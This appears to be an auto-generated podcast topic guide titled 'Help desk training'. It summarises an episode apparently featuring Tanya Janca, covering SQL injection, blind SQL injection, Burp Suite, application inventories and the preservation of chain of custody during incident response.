Topic Guide
What Is Help desk training?
Help desk training is a subject covered in depth across 1 podcast episode in our database. Below you'll find key concepts, expert insights, and the top episodes to listen to β all distilled from hours of conversation by leading experts.
Key Concepts in Help desk training
Application security (appsec)
Appsec is the process of developing, adding, and testing security features within applications to prevent vulnerabilities. Tanya Janca's mission is to help software developers write more secure code, emphasizing that Appsec should focus on aiding developers rather than just criticizing them.
Sql injection
SQL Injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. It can allow attackers to bypass authentication, exfiltrate data, or even control the database, as Tanya experienced when her own app was exploited and later demonstrated in a CTF.
Burp suite
Burp Suite is a widely used set of tools for performing security testing of web applications. It allows users to monitor, capture, and manipulate network traffic between a computer and a web application, facilitating analysis and exploitation of vulnerabilities, as Tanya learned early in her hacking mentorship.
Blind sql injection
Blind SQL Injection is a type of SQL injection attack where the attacker asks the database true/false questions and determines the answer based on the application's response (or lack thereof), rather than receiving direct data. This method allows for data exfiltration character by character, which Tanya eventually understood to explain a past government data breach.
Chain of custody
In digital forensics, the chain of custody is the chronological documentation or paper trail showing the seizure, custody, control, transfer, analysis, and disposition of physical or electronic evidence. Maintaining an unbroken chain of custody is crucial for evidence to be admissible in court, as highlighted by the help desk incident where it was destroyed.
What Experts Say About Help desk training
- 1.SQL injection is a powerful attack vector that can bypass login screens and exfiltrate sensitive data, as Tanya Janca demonstrated in a Capture the Flag (CTF) challenge and experienced firsthand with her own applications.
- 2.Blind SQL Injection is a sophisticated technique where attackers exfiltrate data by asking a database yes/no questions, often on specific criteria like the first letter of a field, rather than directly retrieving records.
- 3.A complete and accurate inventory of all applications is crucial for organizational security, as demonstrated when Tanya's team discovered numerous unsecured, unknown apps during a data breach investigation.
- 4.Untrained IT help desk staff can escalate panic during incidents or, worse, destroy critical evidence, breaking the chain of custody for potential criminal cases, as tragically illustrated by the child exploitation image incident.
- 5.Organizational policies, such as designated streaming areas during the Olympics, are vital to maintain network integrity; ignoring them can lead to severe network congestion and perceived 'malware' incidents.
- 6.Effective incident response requires specialized training and clear protocols, ensuring that technical experts manage crises and that false alarms are welcomed over missed threats.